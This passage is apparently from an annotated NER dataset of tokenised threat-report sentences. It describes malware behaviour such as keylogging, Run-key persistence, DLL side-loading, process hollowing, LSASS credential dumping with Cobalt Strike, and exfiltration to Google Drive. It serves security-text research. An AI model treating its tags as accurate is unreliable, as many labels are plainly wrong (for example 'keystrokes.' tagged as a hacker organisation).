[ - "Those", - "files", - "will", - "still", - "get", - "executed,", - "if", - "the", - "user", - "clicks", - "on", - "run" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Full", - "path", - "to", - "file", - "and", - "hidden", - "files" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "As", - "LSASS", - "dumps", - "are", - "nowadays", - "recognized", - "by", - "the", - "dump", - "file", - "itself" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "LSASS", - "dump", - "in", - "c:\\tmp", - "detected", - "and", - "deleted" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LSASS", - "dump", - "in", - "the", - "WebDAV", - "detected" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "done", - "via", - "the", - "GetAsyncKeyState", - "API," - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "this", - "is", - "done", - "via", - "the", - "popen", - "API" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "uses", - "Windows", - "API", - "functions", - "to", - "execute", - "files" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "is", - "done", - "via", - "the", - "GetAsyncKeyState", - "API,", - "with", - "keystrokes", - "being", - "logged" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "keylogging", - "are", - "enabled", - "by", - "default," - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "logs", - "keystrokes", - "for", - "windows", - "with", - "titles", - "containing", - "substrings", - "specified", - "in", - "its", - "configuration" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Window", - "titles", - "to", - "keylog" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "can", - "log", - "keystrokes." - ], - "ner_tags": [ - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Screenshots", - "are", - "also", - "taken", - "at", - "a", - "configurable", - "interval;", - "the", - "default", - "is", - "once", - "every", - "30", - "seconds." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Screenshots", - "and", - "keylogging", - "are", - "enabled", - "by", - "default," - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "can", - "capture", - "screenshots" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "shellcode", - "is", - "stored", - "in", - "files", - "instead", - "of", - "the", - "registry,", - "and", - "the", - "stored", - "shellcode", - "is", - "loaded", - "and", - "executed", - "on", - "Dolphin’s", - "startup" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O" - ] - }, - { - "tokens": [ - "The", - "backdoor", - "periodically", - "checks", - "and", - "creates", - "its", - "own", - "persistence", - "by", - "making", - "sure", - "that", - "Step", - "1", - "of", - "the", - "loader", - "is", - "run", - "every", - "time", - "the", - "system", - "is", - "started,", - "via", - "a", - "registry", - "Run", - "value,", - "in", - "the", - "same", - "way", - "as", - "in", - "the", - "installer:", - "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\<random_run_name>\\”%appdata%\\Python27({32|64})\\pythonw.exe”", - "“<loader_step_1>”", - "“<loader_encrypted_step_2>”" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "uses", - "Run", - "keys", - "for", - "persistence", - "of", - "its", - "loader" - ], - "ner_tags": [ - "O", - "B-Tool", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "can", - "execute", - "shell", - "commands" - ], - "ner_tags": [ - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "creates", - "directory", - "listings" - ], - "ner_tags": [ - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "The", - "command", - "to", - "get", - "specific", - "files" - ], - "ner_tags": [ - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features" - ] - }, - { - "tokens": [ - "It", - "creates", - "directory", - "listings" - ], - "ner_tags": [ - "O", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "to", - "get", - "files", - "from", - "drives" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "it", - "searches", - "the", - "drives", - "of", - "compromised", - "systems", - "for", - "interesting", - "files" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "can", - "obtain", - "file", - "and", - "directory", - "listings." - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "O", - "O", - "B-HackOrg" - ] - }, - { - "tokens": [ - "The", - "following", - "file", - "extensions", - "of", - "interest,", - "specific", - "to", - "media,", - "documents,", - "emails,", - "and", - "certificates," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "can", - "collect", - "files", - "from", - "local", - "drives." - ], - "ner_tags": [ - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Username" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "obtains", - "the", - "victim’s", - "username." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Computer", - "name" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "RAM", - "size", - "and", - "usage" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OS", - "version" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "obtains", - "various", - "system", - "information", - "including", - "OS", - "version,", - "computer", - "name", - "and", - "RAM", - "size." - ], - "ner_tags": [ - "B-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "List", - "of", - "installed", - "security", - "products" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "obtains", - "a", - "list", - "of", - "installed", - "security", - "software." - ], - "ner_tags": [ - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Local", - "and", - "external", - "IP", - "address" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "obtains", - "the", - "device’s", - "local", - "and", - "external", - "IP", - "address." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XOR-decrypts", - "an", - "embedded", - "PE", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "B-SamFile" - ] - }, - { - "tokens": [ - "XOR-decrypts", - "further", - "shellcode", - "carried", - "within", - "itself," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XOR-decrypts", - "its", - "contents," - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "decrypted", - "configuration" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "injects", - "it", - "into", - "the", - "created", - "process" - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "in", - "a", - "specified", - "separate", - "process", - "that", - "is", - "created", - "and", - "injected." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "and", - "inject", - "processes." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Features" - ] - }, - { - "tokens": [ - "it", - "creates", - "a", - "one-time", - "scheduled", - "task." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "a", - "temporary", - "scheduled", - "task", - "to", - "start", - "after", - "installation." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "execution,", - "the", - "output", - "of", - "commands", - "is", - "uploaded." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "exfiltrates", - "data", - "to", - "Google", - "Drive", - "storage" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "it", - "searches", - "the", - "drives", - "of", - "compromised", - "systems", - "for", - "interesting", - "files", - "and", - "exfiltrates", - "them", - "to", - "Google", - "Drive." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "exfiltrates", - "data", - "to", - "Google", - "Drive." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "shellcode", - "is", - "stored", - "in", - "the", - "registry," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "sending", - "an", - "HTTP", - "POST", - "request" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "HTTPS", - "to", - "communicate", - "with", - "Google", - "Drive." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "staging", - "the", - "data", - "in", - "encrypted", - "ZIP", - "archives", - "before", - "upload." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "stages", - "collected", - "data", - "in", - "a", - "directory", - "before", - "exfiltration" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "content", - "is", - "encrypted", - "using", - "AES", - "CBC", - "with", - "random", - "16-byte", - "keys", - "and", - "IVs," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Most", - "strings", - "in", - "this", - "version", - "are", - "base64", - "encoded." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "base64-encoded", - "strings", - "were", - "plaintext", - "again", - "in", - "this", - "version." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "has", - "encrypted", - "components." - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "another", - "shellcode,", - "XOR-decrypts", - "an", - "embedded", - "PE", - "file", - "–", - "the", - "Dolphin", - "backdoor", - "–", - "and", - "loads", - "and", - "executes", - "it", - "using", - "a", - "custom", - "PE", - "loader." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "which", - "is", - "vulnerable", - "to", - "a", - "DLL", - "side-loading", - "vulnerability,", - "and", - "loads", - "a", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "sideloading", - "different", - "DLL", - "names,", - "and", - "multiple", - "binary", - "files", - "names", - "being", - "loaded", - "by", - "those", - "DLLs." - ], - "ner_tags": [ - "B-Features", - "O", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "executables", - "and", - "sideloaded", - "files" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Side-loaded", - "DLL", - "name" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "threat", - "actor", - "abusing", - "a", - "sideloading", - "vulnerability" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Name", - "of", - "the", - "malicious", - "side-loaded", - "DLL" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SecTeam", - "O" - ] - }, - { - "tokens": [ - "Name", - "of", - "the", - "executable", - "vulnerable", - "to", - "side", - "loading" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "seemingly", - "legitimate", - "executables", - "and", - "their", - "respective", - "sideloaded", - "files" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "encoded", - "shellcode" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Creates", - "a", - "memory", - "section", - "with", - "the", - "DES-encrypted", - "malware", - "configuration" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "obfuscate", - "their", - "malware." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "VMProtect", - "to", - "obfuscate", - "one", - "of", - "them." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "that", - "decompresses", - "and", - "loads", - "the", - "first", - "stage", - "in", - "memory." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "shellcode", - "decompressing", - "and", - "loading" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "there", - "was", - "only", - "one", - "stage", - "being", - "decrypted", - "in", - "memory" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "malware", - "decrypts", - "the", - "saved", - "passwords" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "and", - "then", - "decrypts", - "them" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "and", - "then", - "decrypts", - "the", - "content" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "calls", - "Stage", - "1", - "again", - "via", - "process", - "hollowing", - "with", - "four", - "parameters" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "then", - "runs", - "Stage", - "2", - "via", - "process", - "hollowing." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "creates", - "a", - "registry", - "key" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "service", - "that", - "launches", - "the", - "moved", - "executable", - "rc.exe", - "with", - "one", - "parameter." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Screenshot", - "grab" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Drive", - "information", - "retrieval" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "browses", - "a", - "directory" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Process", - "manager", - "(browses", - "and", - "terminates", - "processes)" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Current", - "process", - "ID" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "deletes," - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "uploads,", - "downloads", - "a", - "file" - ], - "ner_tags": [ - "B-Features", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "Command", - "execution" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "by", - "calling", - "the", - "GetNetworkParams", - "API", - "function" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "Collected", - "machine", - "information", - "includes", - "the", - "following:", - "Randomly", - "generated", - "GUID", - "Hostname" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Processor", - "architecture" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Operating", - "system", - "version" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Username" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "Local", - "IP", - "address", - "and", - "port", - "used", - "to", - "send", - "the", - "network", - "packet" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "The", - "configuration", - "is", - "encrypted", - "with", - "a", - "hardcoded", - "DES", - "key", - "and", - "is", - "a", - "few", - "bytes", - "long" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "malware", - "retrieves", - "information", - "on", - "the", - "infected", - "machine", - "and", - "sends", - "it", - "to", - "the", - "C&C", - "encrypted", - "with", - "DES." - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "information", - "is", - "sent", - "to", - "the", - "C&C,", - "encrypted", - "with", - "a", - "hardcoded", - "key", - "and", - "DES", - "CBC", - "algorithm:" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "malware", - "retrieves", - "information", - "on", - "the", - "infected", - "machine", - "and", - "sends", - "it", - "to", - "the", - "C&C" - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Then,", - "the", - "malware", - "retrieves", - "information", - "on", - "the", - "compromised", - "computer", - "and", - "sends", - "it", - "to", - "the", - "C&C." - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "as", - "a", - "lure", - "to", - "entice", - "the", - "victim", - "into", - "opening", - "the", - "malicious", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "to", - "extract", - "the", - "URL,", - "login,", - "and", - "password", - "fields", - "from", - "the", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Name", - "of", - "the", - "hardcoded", - "directory", - "where", - "files", - "are", - "copied" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "malware", - "also", - "established", - "persistence", - "on", - "the", - "host", - "with", - "the", - "creation", - "of", - "a", - "registry", - "run", - "key." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "persistence", - "was", - "achieved", - "by", - "creating", - "a", - "‘Run’", - "key" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "These", - "files", - "were", - "transferred", - "to", - "the", - "domain", - "controller", - "over", - "SMB." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "dumped", - "lsass", - "memory", - "on", - "the", - "domain", - "controller." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "We", - "observed", - "a", - "process", - "created", - "by", - "Cobalt", - "Strike", - "accessing", - "lsass.exe" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "is", - "a", - "known", - "indicator", - "of", - "such", - "tools", - "as", - "Mimikatz" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "most", - "likely", - "using", - "credentials", - "gathered", - "by", - "the", - "previous", - "LSASS", - "access." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "then", - "proceeded", - "to", - "access", - "lsass", - "memory", - "on", - "the", - "host", - "to", - "extract", - "credentials." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor", - "became", - "active", - "by", - "initiating", - "a", - "proxied", - "RDP", - "connection", - "via", - "the", - "Cobalt", - "Strike", - "beacon", - "to", - "the", - "domain", - "controller." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "after", - "completing", - "RDP", - "connections", - "to", - "various", - "hosts", - "on", - "the", - "network" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "which", - "were", - "started", - "via", - "their", - "interactive", - "RDP", - "session" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "RDP", - "was", - "also", - "used", - "by", - "the", - "threat", - "actor" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg" - ] - }, - { - "tokens": [ - "The", - "threat", - "actor", - "was", - "able", - "to", - "RDP", - "to", - "a", - "backup", - "server" - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "running", - "processes", - "were", - "reviewed" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actors", - "checked", - "running", - "processes", - "on", - "the", - "accessed", - "hosts", - "via", - "taskmanager" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "checking", - "on", - "running", - "tasks," - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "new", - "drive", - "contained", - "a", - "LNK", - "file", - "6570872.lnk", - "and", - "hidden", - "folder", - "“me”." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "The", - "contents", - "of", - "hidden", - "folder", - "“me”,", - "included", - "several", - "files", - "and", - "folders", - "that", - "were", - "used", - "for", - "the", - "execution" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "folder", - "included", - "a", - "legitimate", - "copy", - "of", - "rundll32.exe" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "rundll32.exe", - "binary", - "downloaded", - "approximately", - "0.4", - "MB", - "of", - "data." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "a", - "renamed", - "copy", - "of", - "rundll32." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Batch", - "script", - "to", - "run" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "file", - "would", - "execute", - "a", - "batch", - "script" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\syswow64\\cmd.exe", - "/C" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "An", - "instance", - "of", - "cmd.exe", - "was", - "launched", - "through", - "explorer.exe", - "which", - "ran", - "the", - "following", - "command" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cmd.exe", - "session" - ], - "ner_tags": [ - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actor", - "also", - "used", - "a", - "batch", - "script", - "to", - "collect", - "a", - "list", - "of", - "all", - "computer", - "objects", - "on", - "the", - "domain", - "using", - "C:\\Windows\\system32\\cmd.exe", - "/C", - "adcomp.bat", - "which", - "contained", - "the", - "PowerShell", - "command:" - ], - "ner_tags": [ - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Once", - "the", - "user", - "had", - "mounted", - "the", - "ISO", - "and", - "the", - "LNK", - "file", - "was", - "executed", - "by", - "the", - "user,", - "the", - "complex", - "execution", - "flow", - "started." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "names", - "of", - "the", - "registry", - "values", - "changed" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "last", - "registry", - "key", - "was", - "used", - "to", - "store", - "additional", - "PowerShell", - "code." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "This", - "script", - "called", - "a", - "combination", - "of", - "QueueUserAPC,", - "GetCurrentThreadId,", - "OpenThread,", - "and", - "VirtualAlloc" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor", - "injected", - "into", - "various", - "processes" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "reg.exe", - "query" - ], - "ner_tags": [ - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "started", - "a", - "BITS", - "job", - "to", - "download", - "a", - "Cobalt", - "Strike", - "beacon" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool" - ] - }, - { - "tokens": [ - "whoami" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "whoami", - "/groups" - ], - "ner_tags": [ - "B-Idus", - "O" - ] - }, - { - "tokens": [ - "ipconfig", - "/all" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "threat", - "actor", - "first", - "ran", - "some", - "initial", - "discovery", - "on", - "the", - "host", - "using", - "built-in", - "Windows", - "utilities", - "like", - "ipconfig" - ], - "ner_tags": [ - 